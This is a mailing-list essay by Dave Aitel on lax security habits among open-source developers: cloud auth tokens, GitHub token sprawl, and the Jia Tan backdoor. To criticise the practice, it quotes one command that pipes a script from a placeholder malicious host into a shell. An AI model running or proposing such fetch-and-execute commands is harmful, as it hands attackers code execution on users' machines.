GDB Dances and the Moon

[Dave Aitel via Dailydave <dailydave () lists aitelfoundation org>]

People occasionally read my blogposts
<https://cybersecpolitics.blogspot.com/2024/04/what-open-source-projects-are.html>on
Jia Tan
<https://cybersecpolitics.blogspot.com/2024/04/the-open-source-problem.html>and
then ask me about open source development in general, and you can only, in
your darkest heart of hearts (your only heart) laugh.

The other day I was contributing to a project that I am one of several
developers on. In particular, I wrote a GDB script that traces through a
function, printing out all the various variables and their sizes and this
gets fed into an LLM to try to reason about it, which is a bit like asking
a hedgehog how big a Unicode string should be to fit around the moon, but
it was worth a shot, ya know? I have the kind of dyslexia that means I
can't tell matrix algebra from a thinking conscious creature.

Anyways, while I am good at making GDB dance in particular ways, like
knowing the ancient art of the Polka, I am not good at modern software
development, and barely understand GIT or Docker or Cloud things. But I
have hacked a few things, like ya'll have, and so my development happens in
a VM and that VM has access to pretty much just the source code it needs
and not a whole lot else.

But that's not how modern development works. It's common to see
instructions to run "gcloud auth" and then walk through the web
authentication portal from Google so your current user can access cloud
buckets and APIs while testing or debugging your giant microservice. Like,
people are out there just raw dogging source code from random other open
source developers, with their local environment running tokens that give
them access to everything they could possibly need from their Google
account. People out there running curl www.badstuff.biz/setup | sh. People,
and by this I mean developers, are lost storing five thousand fine grained
GitHub tokens in various text files on their hard drive because they can't
remember which one was which.

In other words: Jia Tan might have been a best case scenario for this
community.

-dave

_______________________________________________
Dailydave mailing list -- dailydave () lists aitelfoundation org
To unsubscribe send an email to dailydave-leave () lists aitelfoundation org